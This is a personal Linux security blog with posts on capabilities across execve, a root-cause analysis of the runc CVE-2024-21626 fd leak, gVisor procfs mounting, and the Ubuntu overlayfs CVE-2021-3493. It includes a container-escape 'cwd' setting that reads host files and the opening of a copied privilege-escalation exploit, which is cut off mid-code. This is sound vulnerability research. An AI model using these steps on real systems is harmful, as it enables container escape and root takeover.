不忘初心 方得始终 (terenceli, liq3ea@163.com, http://terenceli.github.io)

Linux process capability change through execve syscall (2024-02-24)
<h3> The issue </h3>
<p>I have encountered an interesting issue about capability changes across the execve syscall. If we drop the current process’s capability and then execve another program, the new program gets the dropped capability back. The following PoC shows this.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import (
    "os"
    "os/exec"
    goruntime "runtime"
    "syscall"
    "time"

    "github.com/syndtr/gocapability/capability"
)

func main() {
    cap1, _ := capability.NewPid(os.Getpid())
    goruntime.LockOSThread()
    defer goruntime.UnlockOSThread()
    cap1.Unset(capability.EFFECTIVE, 2)
    cap1.Unset(capability.PERMITTED, 2)
    cap1.Unset(capability.INHERITABLE, 2)
    cap1.Unset(capability.BOUNDING, 2)
    cap1.Unset(capability.AMBIENT, 2)
    cap1.Apply(capability.CAPS)

    time.Sleep(20 * time.Second)

    binary, lookErr := exec.LookPath("bash")
    if lookErr != nil {
        panic(lookErr)
    }
    args := []string{"bash"}
    env := os.Environ()
    execErr := syscall.Exec(binary, args, env)
    if execErr != nil {
        panic(execErr)
    }
}
</code></pre></div></div>
<p>During the Sleep, we can see the process has the following capabilities:</p>
<p><img src="/assets/img/capexecve/1.png" alt="" /></p>
<p>After execve, we can see the same process has the following capabilities:</p>
<p><img src="/assets/img/capexecve/2.png" alt="" /></p>
<p>This means the dropped capability is not actually dropped in the new program.</p>
<h3> The solution </h3>
<p>At first this shocked me, but after a quick thought I found the reason: we don’t fork. A child process inherits its parent’s capabilities, but without a fork, execve applies its own capability logic, and in this case the new program gets full capabilities.
The quick solution is to use fork+execve, but our scenario here can’t use fork for some reason.
After some more thought, I suddenly remembered that Linux has a process attribute named ‘no_new_privs’. The ‘no_new_privs’ <a href="https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt">document</a> says:</p>
<blockquote>
<p>With no_new_privs set, execve promises not to grant the privilege to do anything that could not have been done without the execve call.</p>
</blockquote>
<p>But almost all of that document is about suid, not capabilities.
Then I tried the following code: add Prctl(unix.PR_SET_NO_NEW_PRIVS) after dropping the capability, then do the execve syscall.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import (
    "fmt"
    "os"
    "os/exec"
    goruntime "runtime"
    "syscall"
    "time"

    "github.com/syndtr/gocapability/capability"
    "golang.org/x/sys/unix"
)

func main() {
    cap1, _ := capability.NewPid(os.Getpid())
    goruntime.LockOSThread()
    defer goruntime.UnlockOSThread()
    cap1.Unset(capability.EFFECTIVE, 2)
    cap1.Unset(capability.PERMITTED, 2)
    cap1.Unset(capability.INHERITABLE, 2)
    cap1.Unset(capability.BOUNDING, 2)
    cap1.Unset(capability.AMBIENT, 2)
    cap1.Apply(capability.CAPS)

    if err := unix.Prctl(unix.PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0); err != nil {
        fmt.Println("set new privs error")
    }

    time.Sleep(20 * time.Second)

    binary, lookErr := exec.LookPath("bash")
    if lookErr != nil {
        panic(lookErr)
    }
    args := []string{"bash"}
    env := os.Environ()
    execErr := syscall.Exec(binary, args, env)
    if execErr != nil {
        panic(execErr)
    }
}
</code></pre></div></div>
</code></pre></div></div>
<p>After execve, I see the following process capabilities; as we can see, it works.</p>
<p><img src="/assets/img/capexecve/3.png" alt="" /></p>
<h3> The internals </h3>
<p>When execve detects that the current process has no_new_privs set, the ‘check_unsafe_exec’ function in fs/exec.c adds the ‘LSM_UNSAFE_NO_NEW_PRIVS’ flag to ‘bprm->unsafe’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void check_unsafe_exec(struct linux_binprm *bprm)
{
    struct task_struct *p = current, *t;
    unsigned n_fs;
    ...
    /*
     * This isn't strictly necessary, but it makes it harder for LSMs to
     * mess up.
     */
    if (task_no_new_privs(current))
        bprm->unsafe |= LSM_UNSAFE_NO_NEW_PRIVS;
    ...
}
</code></pre></div></div>
<p>Later, the ‘cap_bprm_creds_from_file’ function in security/commoncap.c checks ‘bprm->unsafe & ~LSM_UNSAFE_PTRACE’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int cap_bprm_creds_from_file(struct linux_binprm *bprm, struct file *file)
{
    ...
    /* Don't let someone trace a set[ug]id/setpcap binary with the revised
     * credentials unless they have the appropriate permit.
     *
     * In addition, if NO_NEW_PRIVS, then ensure we get no new privs.
     */
    is_setid = __is_setuid(new, old) || __is_setgid(new, old);

    if ((is_setid || __cap_gained(permitted, new, old)) &&
        ((bprm->unsafe & ~LSM_UNSAFE_PTRACE) ||
         !ptracer_capable(current, new->user_ns))) {
        /* downgrade; they get no more than they had, and maybe less */
        if (!ns_capable(new->user_ns, CAP_SETUID) ||
            (bprm->unsafe & LSM_UNSAFE_NO_NEW_PRIVS)) {
            new->euid = new->uid;
            new->egid = new->gid;
        }
        new->cap_permitted = cap_intersect(new->cap_permitted,
                                           old->cap_permitted);
    }
    ...
}
</code></pre></div></div>
<p>If this condition is true, it calculates the new cap_permitted using ‘cap_intersect’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> new->cap_permitted = cap_intersect(new->cap_permitted,
old->cap_permitted);
</code></pre></div></div>
<p>In this way, the capabilities dropped in the current process carry over to the newly execve’d program.</p>
Why Golang eats my fd 3 in the child process (2024-02-03)
<p>Recently I analyzed the runc vulnerability CVE-2024-21626. The root cause of this vulnerability is that a cgroup fd is leaked to the ‘runc init’ process. While digging into the root cause, I found something interesting about Golang’s fd inheritance. This post describes the findings in detail.
First we need to have a look at CVE-2024-21626.</p>
<h3> CVE-2024-21626 analysis </h3>
<h4> runc double clone process </h4>
<p>While creating the container environment, runc uses a double-clone method to do the complicated separation work. The following pic shows the process.</p>
<p><img src="/assets/img/golangeatfd3/1.png" alt="" /></p>
<p>runc first starts the runc[0:PARENT] process, runc[0:PARENT] clones a runc[1:CHILD] process, runc[1:CHILD] clones the runc[2:INIT] process, and finally runc[2:INIT] executes the process specified in the OCI configuration.</p>
<h4> runc fd leak vulnerability </h4>
<p>runc[2:INIT] does the final work, such as preparing the rootfs, changing into it, and finding the executable, before executing the container process. During this work, an fd can be leaked to the container process. Because such an fd points to a file in the host filesystem, if the container process can see it, the container can break out of its environment by leveraging this fd. runc has had several vulnerabilities of this kind in its history; the most famous is CVE-2019-5736. The root cause of CVE-2019-5736 is that the container process can see /proc/self/exe, which points to the host runc binary. The following pic (from https://blog.wohin.me/posts/hack-runc-elf-inject/) shows the root cause of CVE-2019-5736 and how to exploit it.</p>
<p><img src="/assets/img/golangeatfd3/2.png" alt="" /></p>
<h4> CVE-2024-21626 </h4>
<p>The root cause of this vulnerability is that an fd pointing to the /sys/fs/cgroup directory is leaked to the runc init process. The leak happens here, in file libcontainer/cgroups/file.go:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>func prepareOpenat2() error {
    prepOnce.Do(func() {
        fd, err := unix.Openat2(-1, cgroupfsDir, &unix.OpenHow{
            Flags: unix.O_DIRECTORY | unix.O_PATH, // no unix.O_CLOEXEC flag
        })
        ...
</code></pre></div></div>
<p>unix.Openat2 is used to open cgroupfsDir (/sys/fs/cgroup) without the unix.O_CLOEXEC flag set. After runc init execves the container process, this fd is not closed and is thus leaked to the container process.
When we add a Sleep in runc init, we can see the following:</p>
<p><img src="/assets/img/golangeatfd3/3.png" alt="" /></p>
<p>As we can see, fd 7 points to /sys/fs/cgroup. We can set the ‘cwd’ in the OCI config to ‘/proc/self/fd/7/../../../../’; when the container process runs, its current working directory will point to the host rootfs.
Use the following ‘args’ and ‘cwd’ to run a container:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "args": [
"cat", "hostfile"
],
...
"cwd": "/proc/self/fd/7/../../../../",
</code></pre></div></div>
<p>We can see the container process reads the host file successfully.</p>
<p><img src="/assets/img/golangeatfd3/4.png" alt="" /></p>
<p>It seems not difficult to understand this vulnerability. But while reading the fix patches, I found something interesting. The first thing is that after applying the backported commit <a href="https://github.com/opencontainers/runc/pull/4004/commits/937ca107c3d22da77eb8e8030f2342253b980980">937ca107c3d22da77eb8e8030f2342253b980980</a> I can’t see the fd leak anymore. I also saw these words:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> In practice, on runc 1.1 this does leak to "runc init" but on main the
handle has a low enough file descriptor that it gets clobbered by the
ForkExec of "runc init".
</code></pre></div></div>
<p>I wanted to know how it gets ‘clobbered’. Also, in cgroup v2 this issue doesn’t exist, and runc exec doesn’t trigger this issue.
In summary, several questions attracted my attention.</p>
<ol>
<li>Why the main branch isn’t affected by this CVE</li>
<li>Why cgroup v2 isn’t affected by this CVE</li>
<li>Why the first patch mitigates this CVE</li>
<li>Why ‘runc exec’ doesn’t trigger this CVE</li>
</ol>
<p>I decided to dig into this issue.</p>
<h3> The fd inheritance in Golang cmd Run </h3>
<p>First of all, I need to find out the fd inheritance behaviour of os.Open and unix.Openat2, as the first is related to commit <a href="https://github.com/opencontainers/runc/pull/4004/commits/937ca107c3d22da77eb8e8030f2342253b980980">937ca107c3d22da77eb8e8030f2342253b980980</a> and the second is related to the fd leak. I wrote two simple programs. The first is ‘wait’; it is just there to be launched by the other program, ‘test’. After ‘wait’ starts, we can inspect the fd status of these two processes.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// wait
package main

import "time"

func main() {
    time.Sleep(20 * time.Second)
}
</code></pre></div></div>
<h4> os.Open fd </h4>
<p>Using the following ‘test’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> os.Open("/home/test")
cmd := exec.Command("/home/test/go/src/test/wait")
cmd.Run()
</code></pre></div></div>
<p><img src="/assets/img/golangeatfd3/5.png" alt="" /></p>
<p>cmd.Run uses ForkExec to start the new process. As we can see, the child process doesn’t inherit the fd opened by os.Open. This is because os.Open adds O_CLOEXEC, so every file opened by os.Open is closed on execve. The source code can be found <a href="https://github.com/golang/go/blob/master/src/os/file_unix.go#L272">here</a>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func openFileNolog(name string, flag int, perm FileMode) (*File, error) {
...
var r int
var s poll.SysFile
for {
var e error
r, s, e = open(name, flag|syscall.O_CLOEXEC, syscallMode(perm))
...
</code></pre></div></div>
<h4> syscall.Openat2 fd </h4>
<p>Let’s see the behaviour of unix.Openat2, using the following ‘test’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> unix.Openat2(-1, "/sys/fs/cgroup", &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH})
cmd := exec.Command("/home/test/go/src/test/wait")
cmd.Run()
</code></pre></div></div>
<p>As we can see, the “/sys/fs/cgroup” fd appears in the child process.</p>
<p><img src="/assets/img/golangeatfd3/6.png" alt="" /></p>
<p>So the fd opened by ‘unix.Openat2’ is not closed after ForkExec and is inherited by the child.</p>
<h4> The magic </h4>
<p>When I applied just the commit <a href="https://github.com/opencontainers/runc/pull/4004/commits/937ca107c3d22da77eb8e8030f2342253b980980">937ca107c3d22da77eb8e8030f2342253b980980</a>, the interesting thing happened. Though ‘runc run’ has an fd pointing to ‘/sys/fs/cgroup’, ‘runc init’ doesn’t have this fd. The cgroupfd in the ‘tryDefaultCgroupRoot’ function is closed in time after applying the 937c commit, so the ‘runc run’ fd 3 is the fd opened in the ‘prepareOpenat2’ function.</p>
<p><img src="/assets/img/golangeatfd3/7.png" alt="" /></p>
<p>But as we saw in our previous test, the fd opened by ‘unix.Openat2’ should be inherited by the child process, yet we don’t see the fd in the child. What’s wrong?
After navigating the runc code and doing some experiments, I found that the biggest difference between how runc starts a new process and my test is that, in the runc case, it also sets cmd.ExtraFiles before calling cmd.Run.
Let’s do the following test.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> unix.Openat2(-1, "/sys/fs/cgroup", &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH})
cmd := exec.Command("/home/test/go/src/test/wait")
cmd.SysProcAttr = &unix.SysProcAttr{}
pipeRead, pipeWrite, _ := os.Pipe()
defer pipeRead.Close()
defer pipeWrite.Close()
cmd.ExtraFiles = []*os.File{pipeWrite}
cmd.Run()
</code></pre></div></div>
<p>Following is the fd of parent and child process.</p>
<p><img src="/assets/img/golangeatfd3/8.png" alt="" /></p>
<p>We have reproduced the issue: fd 3 is eaten by Golang during cmd.Run if we add cmd.ExtraFiles. What if we open two fds with unix.Openat2?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> unix.Openat2(-1, "/sys/fs/cgroup", &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH})
unix.Openat2(-1, "/home/test", &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH})
cmd := exec.Command("/home/test/go/src/test/wait")
cmd.SysProcAttr = &unix.SysProcAttr{}
pipeRead, pipeWrite, _ := os.Pipe()
defer pipeRead.Close()
defer pipeWrite.Close()
cmd.ExtraFiles = []*os.File{pipeWrite}
cmd.Run()
</code></pre></div></div>
<p>As we can see, only fd 3 is eaten.</p>
<p><img src="/assets/img/golangeatfd3/9.png" alt="" /></p>
<p>After reading the Go source and documentation, I found the following words in https://pkg.go.dev/os/exec.</p>
<p><img src="/assets/img/golangeatfd3/10.png" alt="" /></p>
<p>ExtraFiles specifies open files to be inherited by the child process, and entry i becomes file descriptor 3+i, as the first three are standard input/output/error. If we add two ExtraFiles, we can see that our fd 4 is also eaten.</p>
<p><img src="/assets/img/golangeatfd3/11.png" alt="" /></p>
<p>Now it’s clear that cmd.ExtraFiles is guaranteed to be visible in the child process at fd 3+i, and it may overwrite fds inherited from the parent.</p>
<h3> Conclusion </h3>
<h4> About the CVE-2024-21626 </h4>
<p>After the investigation, we can now see the full picture of CVE-2024-21626.
The root cause of this CVE is that a cgroupfd is leaked to ‘runc init’. This cgroupfd is opened in prepareOpenat2 using unix.Openat2 without the O_CLOEXEC flag set, so this fd is leaked to ‘runc init’.
The main branch is not affected because it has commit <a href="https://github.com/opencontainers/runc/pull/4004/commits/937ca107c3d22da77eb8e8030f2342253b980980">937ca107c3d22da77eb8e8030f2342253b980980</a>. This commit closes the other opened cgroupfd in time, so the fd opened in prepareOpenat2 gets fd 3; being that low, it is clobbered by cmd.Run (ForkExec).
cgroup v2 is not affected because tryDefaultCgroupRoot opens a cgroupfd only for cgroup v1, so even without commit 937c the prepareOpenat2 fd will be 3.
‘runc exec’ doesn’t trigger this CVE because tryDefaultCgroupRoot will only be called in the ‘runc init’ process, not in ‘runc exec’, so the prepareOpenat2 fd will be 3.</p>
<h4> Golang fd inheritance after cmd Run </h4>
<p>Three things to take away from this CVE:</p>
<ol>
<li>An os.Open fd will be automatically closed on execve, as Golang adds O_CLOEXEC implicitly</li>
<li>A unix.Openat2 fd will not be closed automatically and will be inherited by the child process, even when this is unwanted</li>
<li>Golang only guarantees that cmd.ExtraFiles will be inherited by the child process at fd 3+i, and this may clobber unintentionally inherited fds.</li>
</ol>
<h3> Ref </h3>
<p>The runc internals (written by myself): https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/12/28/runc-internals-3</p>
Mount procfs in unprivileged container (2023-12-29)
<h3> Background </h3>
<p>gVisor is an application kernel that implements a substantial portion of the Linux system surface. gVisor is mostly used in cloud native environments, as it implements an OCI runtime, runsc. runsc uses the application kernel, named Sentry, to run the user’s application. In this way, the application doesn’t share the same kernel with the host as it does under runc, which largely reduces the attack surface in the container ecosystem.</p>
<p>gVisor is quite interesting in that it rewrites the Linux syscall interface. The foundation of gVisor is system call interception. gVisor has three means of system call interception: ptrace, kvm and systrap. gVisor uses these interception means to intercept the user application’s syscalls and reimplement them in Sentry.</p>
<p>Though gVisor is mostly used in the cloud native ecosystem, it is also useful as a process-level sandbox. I have designed a process-level sandbox based on gVisor to sandbox dangerous third-party programs.</p>
<p>Recently I encountered a problem running gVisor in an unprivileged container such as docker or podman. When I run gVisor in docker it returns an EPERM error code. The following shows the error.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # docker run -it --rm --security-opt apparmor=unconfined --security-opt seccomp=unconfined ubuntu
root@21adbdee0c6d:/# cd /tmp
root@21adbdee0c6d:/tmp# ./runsc -rootless --debug --debug-log=/tmp/log/ do ls
*** Warning: sandbox network isn't supported with --rootless, switching to host ***
creating container: cannot create sandbox: cannot read client sync file: waiting for sandbox to start: EOF
root@21adbdee0c6d:/tmp# cd log/
root@21adbdee0c6d:/tmp/log# ls
...
W1227 04:54:24.366822 1 specutils.go:124] noNewPrivileges ignored. PR_SET_NO_NEW_PRIVS is assumed to always be set.
W1227 04:54:24.366995 1 util.go:64] FATAL ERROR: error mounting proc: operation not permitted
error mounting proc: operation not permitted
root@21adbdee0c6d:/tmp/log#
</code></pre></div></div>
<p>After navigating the code, I found the error occurs when <a href="https://github.com/google/gvisor/blob/master/runsc/cmd/gofer.go#L394C21-L394C21">mounting procfs</a>.
The error is that mounting procfs in a docker container returns EPERM.</p>
<h3> Analysis </h3>
<p>The mount syscall has several points where it can return EPERM. We need to find which one causes our gVisor failure.</p>
<p>I used the following method. First, patch gVisor to add sleep code before the mount procfs error, then run runsc. The gofer process (where the mount failure occurs) will sleep. We use trace-cmd to trace the gofer process’s kernel function calls.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> trace-cmd record -P <goferpid> function_graph
</code></pre></div></div>
<p>After looking at the trace output, I found the suspicious function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> | security_sb_kern_mount();
| mount_too_revealing() {
| down_read() {
| __cond_resched();
| }
| _raw_spin_lock();
| _raw_spin_unlock();
| up_read();
| }
| fc_drop_locked() {
</code></pre></div></div>
<p>From the trace we can see that ‘mount_too_revealing’ returns true and is responsible for our EPERM. ‘mount_too_revealing’ calls ‘mnt_already_visible’ to make the decision. As my <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/03/06/cve-2022-0492">previous blog</a> said:</p>
<p>‘mnt_already_visible’ iterates over the mounts in the new mount namespace and checks whether the existing procfs mount has child mountpoints. If it has child mountpoints, procfs is not fully visible in this mount namespace, so a new procfs will not be mounted. The reason is as follows: procfs and sysfs contain some global data that the container should not touch, so mounting procfs and sysfs in a new user namespace must be restricted. Otherwise, we could mount a fresh procfs in the new user namespace and see all of its data. In the docker and runc environment, there are ‘maskedPaths’, which are paths that should be masked in the container; they appear as child mounts over /proc.</p>
<p>I also found an old discussion in a <a href="https://github.com/opencontainers/runc/issues/1658">runc issue</a>. The reason is just as I said, but Alban Crequy gives <a href="https://github.com/opencontainers/runc/issues/1658#issuecomment-375750981">two solutions</a>.</p>
<ol>
<li>
<p>by adding ‘-v /proc:/newproc’ to the docker command, runsc can see a full procfs, so there will be no EPERM</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># docker run -it --rm --security-opt apparmor=unconfined --security-opt seccomp=unconfined -v /proc:/newproc ubuntu
root@0723fa9d5c92:/# cd /tmp/
root@0723fa9d5c92:/tmp# ls
runsc
root@0723fa9d5c92:/tmp# ./runsc --rootless do ls
*** Warning: sandbox network isn't supported with --rootless, switching to host ***
runsc runsc-do1613356723
root@0723fa9d5c92:/tmp#
</code></pre></div> </div>
</li>
<li>
<p>by first creating a dead pidns, then mounting its procfs into the docker container</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # unshare -p -f mount -t proc proc /mnt/proc
# docker run -it --rm --security-opt apparmor=unconfined --security-opt seccomp=unconfined -v /mnt/proc:/newproc ubuntu
root@eda100eadf1f:/# cd /tmp
root@eda100eadf1f:/tmp# ./runsc --rootless do ls
*** Warning: sandbox network isn't supported with --rootless, switching to host ***
runsc runsc-do1925241706
root@eda100eadf1f:/tmp#
</code></pre></div> </div>
</li>
</ol>
<p>Neither solution is very elegant. Luckily, runsc doesn’t need to mount a whole procfs here; it just needs to open /proc/self/fd and read some generic files. Andrei Vagin has prepared a <a href="https://github.com/google/gvisor/commit/063ee51c57f6cd5c64aa0d115396941dce455b8b">patch</a> to address this issue without any tricks. It bind mounts the current /proc instead of mounting a new procfs instance.</p>
<h3> Conclusion </h3>
<ol>
<li>The mount syscall needs CAP_SYS_ADMIN. An unprivileged user can get CAP_SYS_ADMIN in a new user ns. Some filesystems can be mounted in a new user ns by specifying the ‘FS_USERNS_MOUNT’ flag.</li>
<li>procfs and sysfs can be mounted in a new user ns, but if there are child mounts in procfs or sysfs the mount syscall will return EPERM.</li>
</ol>
<p>Not all filesystems can be mounted in a non-root user namespace. There is a permission check in the mount syscall.</p>
<h3> Ref </h3>
<ol>
<li>gVisor issue: https://github.com/google/gvisor/issues/8205</li>
<li>runc issue: https://github.com/opencontainers/runc/issues/1658</li>
</ol>
CVE-2021-3493 Ubuntu overlayfs privilege escalation vulnerability analysis (2022-09-12)
<p>CVE-2021-3493 is a logic vulnerability in the overlayfs filesystem; combined with a change made by Ubuntu, it can be exploited for privilege escalation. This post introduces the background, the root cause and the fix of this vulnerability.</p>
<h3> Overlayfs </h3>
<p>Overlayfs is a filesystem that combines one upper directory tree and several lower directory trees into one filesystem. The upper directory is mounted read-write and the lower directories are mounted read-only. Filesystem operations on overlayfs are always redirected to the upper or lower layers.
The following pic shows the basic concepts of overlayfs (from <a href="https://arkingc.github.io/2017/09/20/2017-09-20-linux-code-overlayfs-layerinfo/">this post</a>).</p>
<p><img src="/assets/img/cve_2021_3493/1.png" alt="" /></p>
<p>The following pic shows a basic usage of overlayfs.</p>
<p><img src="/assets/img/cve_2021_3493/2.png" alt="" /></p>
<p>As we can see, when creating a file that doesn’t exist in the upper or lower directory, the file is created in the upper directory and persists even after the overlayfs is unmounted. Not only create operations: most (if not all) file operations are redirected to the upper or lower directory, which causes the corresponding underlying filesystem operations to be called. Let’s see the creation process.</p>
<p><img src="/assets/img/cve_2021_3493/3.png" alt="" /></p>
<p>‘ovl_new_inode’ creates the inode of the overlayfs layer, and ‘vfs_create’ creates the file in the upper directory; this is the ‘real’ file. Let’s see another function call chain, for the vulnerable setxattr.</p>
<p><img src="/assets/img/cve_2021_3493/4.png" alt="" /></p>
<p>Here we again see double ‘vfs_setxattr’ calls: the first is for the overlayfs layer and the second is for the upper-directory file, the real file. Notice that ‘cap_convert_nscap’ is called before the first ‘vfs_setxattr’ call, but not before the second. This is the key point of this vulnerability.</p>
<p>This is the background on overlayfs needed to understand this vulnerability. Overlayfs is widely used in containers.</p>
<h3> Capabilities </h3>
<p>Linux capabilities divide the privileges traditionally associated with the superuser into distinct units. To assign capabilities to a process, the binary file itself can be assigned capabilities. An example is the ‘ping’ binary. The ‘ping’ process needs to construct raw sockets, which needs the cap_net_raw capability, so to let unprivileged users use ‘ping’, the ‘ping’ binary needs to be assigned ‘cap_net_raw’.</p>
<p>Binary capabilities are assigned through ‘extended attributes’. The following pic shows the ‘ping’ binary case.</p>
<p><img src="/assets/img/cve_2021_3493/5.png" alt="" /></p>
<p>If the binary has been assigned capabilities, the ‘security.capability’ attribute has a corresponding value. If not, the file has no such extended attribute; see for example the ‘ls’ binary.</p>
<p>When a binary that has ‘capabilities’ is executed, the kernel assigns the capabilities to the process. This is similar to a ‘suid’ binary, but the ‘suid’ bit is set in the file attributes in the inode (if I remember correctly). The following pic shows the ‘su’ binary has no ‘security.capability’ extended attribute.</p>
<p><img src="/assets/img/cve_2021_3493/6.png" alt="" /></p>
<p>struct cred stores the capabilities of a process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct cred {
...
unsigned securebits; /* SUID-less security management */
kernel_cap_t cap_inheritable; /* caps our children can inherit */
kernel_cap_t cap_permitted; /* caps we're permitted */
kernel_cap_t cap_effective; /* caps we can actually use */
kernel_cap_t cap_bset; /* capability bounding set */
kernel_cap_t cap_ambient; /* Ambient capability set */
...
} __randomize_layout;
</code></pre></div></div>
<p>The details of these several capability sets are not the topic of this post. ‘cap_effective’ is used for capability permission checks. When the binary has file capabilities set, ‘get_vfs_caps_from_disk’ is called during the ‘execve’ syscall to read them from the binary file, then ‘bprm_caps_from_vfs_caps’ is called to set the cred’s cap_permitted.</p>
<h3> Mount filesystem in new user namespace </h3>
<p>Not all filesystems can be mounted in a non-root user namespace. There is a permission check in the mount syscall.</p>
<p><img src="/assets/img/cve_2021_3493/7.png" alt="" /></p>
<p>If the filesystem’s fs_flags has no FS_USERNS_MOUNT set, the init user ns will be used to check the CAP_SYS_ADMIN capability. Otherwise, ‘fc->user_ns’ will be used. For a new mount, ‘fc->user_ns’ is set to the current process’s user ns.</p>
<p><img src="/assets/img/cve_2021_3493/8.png" alt="" /></p>
<p>Only a few filesystems set ‘FS_USERNS_MOUNT’: procfs, sysfs, ramfs, tmpfs and so on. Only they can be mounted in a non-root user namespace.</p>
<p>Notice that when the mount syscall is handled, there is also a check of whether the mount namespace’s user ns has CAP_SYS_ADMIN.</p>
<p><img src="/assets/img/cve_2021_3493/9.png" alt="" /></p>
<h3> The vulnerability </h3>
<p>This vulnerability is Ubuntu-specific. Overlayfs can’t be mounted in a non-root user namespace in the mainline upstream Linux kernel, but Ubuntu changed this behaviour by adding ‘FS_USERNS_MOUNT’ to the overlayfs filesystem.
The upstream ‘ovl_fs_type’ definition:</p>
<p><img src="/assets/img/cve_2021_3493/10.png" alt="" /></p>
<p>The Ubuntu ‘ovl_fs_type’ from <a href="https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/focal/tree/fs/overlayfs/super.c?h=Ubuntu-5.4.0-42.46">here</a>.</p>
<p><img src="/assets/img/cve_2021_3493/11.png" alt="" /></p>
<p>But there is also an upstream bug which, combined with Ubuntu’s change, becomes exploitable: a real vulnerability.
Let’s recap the setxattr call chain.</p>
<p><img src="/assets/img/cve_2021_3493/12.png" alt="" /></p>
<p>When userspace triggers a setxattr syscall on an overlayfs file, it calls ‘cap_convert_nscap’. When the size indicates this is the cap v2 format, ‘cap_convert_nscap’ calls ‘ns_capable’ to check the permission.</p>
<p><img src="/assets/img/cve_2021_3493/13.png" alt="" /></p>
<p>Here ‘cap_convert_nscap’ checks whether the ‘inode->i_sb->s_user_ns’ user ns has the ‘CAP_SETFCAP’ capability.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ns_capable(inode->i_sb->s_user_ns, CAP_SETFCAP))
</code></pre></div></div>
<p>The ‘inode->i_sb->s_user_ns’ is assigned by the following call chain.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ovl_mount
  -->mount_nodev
    -->sget
      -->alloc_super

struct super_block *sget(struct file_system_type *type,
            int (*test)(struct super_block *,void *),
            int (*set)(struct super_block *,void *),
            int flags,
            void *data)
{
    struct user_namespace *user_ns = current_user_ns();
    ...
    if (!s) {
        spin_unlock(&sb_lock);
        s = alloc_super(type, (flags & ~SB_SUBMOUNT), user_ns);
        if (!s)
            return ERR_PTR(-ENOMEM);
        goto retry;
    }
    ...
}

static struct super_block *alloc_super(struct file_system_type *type, int flags,
                       struct user_namespace *user_ns)
{
    struct super_block *s = kzalloc(sizeof(struct super_block), GFP_USER);
    static const struct super_operations default_op;
    int i;

    if (!s)
        return NULL;
    INIT_LIST_HEAD(&s->s_mounts);
    s->s_user_ns = get_user_ns(user_ns);
    ...
}
</code></pre></div></div>
<p>As we can see, ‘s->s_user_ns’ is initialized from the user ns of the process doing the ‘mount’, which in the exploit is a new user ns with full capabilities. The ‘inode’ here is the inode that overlayfs creates, so its superblock’s s_user_ns is the new user ns, and a new user ns has CAP_SETFCAP. So ‘ns_capable’ returns true, which means the process has ‘CAP_SETFCAP’ in this new user ns.</p>
<p>Returning to the setxattr syscall call chain: after the ‘cap_convert_nscap’ permission check passes, ‘vfs_setxattr’ is called the first time. Notice, this first call of ‘vfs_setxattr’ uses the overlayfs layer’s dentry. Then it goes to the upper dir’s ‘vfs_setxattr’; as the upperdir is a directory in the host filesystem (ext4), the ext4 filesystem’s setxattr (ext4_xattr_set) is called and finally the extended attributes are written to the upperdir file.</p>
<h3> Exploit </h3>
<p>The following exploit is copied from the <a href="https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/">ssd-disclosure</a> advisory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/mount.h>
//#include <attr/xattr.h>
//#include <sys/xattr.h>

int setxattr(const char *path, const char *name, const void *value, size_t size, int flags);

#define DIR_BASE "./ovlcap"
#define DIR_WORK DIR_BASE "/work"
#define DIR_LOWER DIR_BASE "/lower"
#define DIR_UPPER DIR_BASE "/upper"
#define DIR_MERGE DIR_BASE "/merge"
#define BIN_MERGE DIR_MERGE "/magic"
#define BIN_UPPER DIR_UPPER "/magic"

static void xmkdir(const char *path, mode_t mode)
{
    if (mkdir(path, mode) == -1 && errno != EEXIST)
        err(1, "mkdir %s", path);
}

static void xwritefile(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY);
    if (fd == -1)
        err(1, "open %s", path);
    ssize_t len = (ssize_t) strlen(data);
    if (write(fd, data, len) != len)
        err(1, "write %s", path);
    close(fd);
}

static void xcopyfile(const char *src, const char *dst, mode_t mode)
{
    int fi, fo;
    if ((fi = open(src, O_RDONLY)) == -1)
        err(1, "open %s", src);
